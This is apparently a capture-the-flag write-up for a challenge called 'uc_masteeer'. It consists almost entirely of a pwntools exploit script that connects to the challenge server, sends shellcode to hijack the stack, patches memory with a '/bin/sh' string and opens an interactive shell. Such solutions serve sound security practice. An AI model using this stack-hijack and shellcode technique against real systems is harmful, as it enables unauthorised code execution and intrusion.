## uc_masteeer

Hijack stack directly.

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64'
# context.arch = 'i386'
# context.log_level = 'debug'
execve_file = './uc_masteeer.py'
# execve_file = './a'
# sh = process(execve_file)
sh = remote('111.186.59.29', 10087)

def patch(addr, size, data):
sh.sendlineafter('?: ', '3')
sh.sendafter('addr: ', p64(addr))
sh.sendafter('size: ', p64(size))
sh.sendafter('data: ', data)

shellcode = asm('''

mov rdx, 0xDEADBEF1030
mov rbx, 0xbabecafe000
mov [rbx], rdx
mov rax, 0xbabecafe800

mov rcx, 0xbabecafe233
lea rsp, [rcx-0x18]

mov rcx, 0xdeadbeef066
jmp rcx
''')
sh.send(shellcode)

patch(0xbabecafe233 + 8, 15, b'k33nlab/bin/sh\0')
sh.sendlineafter('?: ', '2')

sh.interactive()

```

Author: www.xmcve.com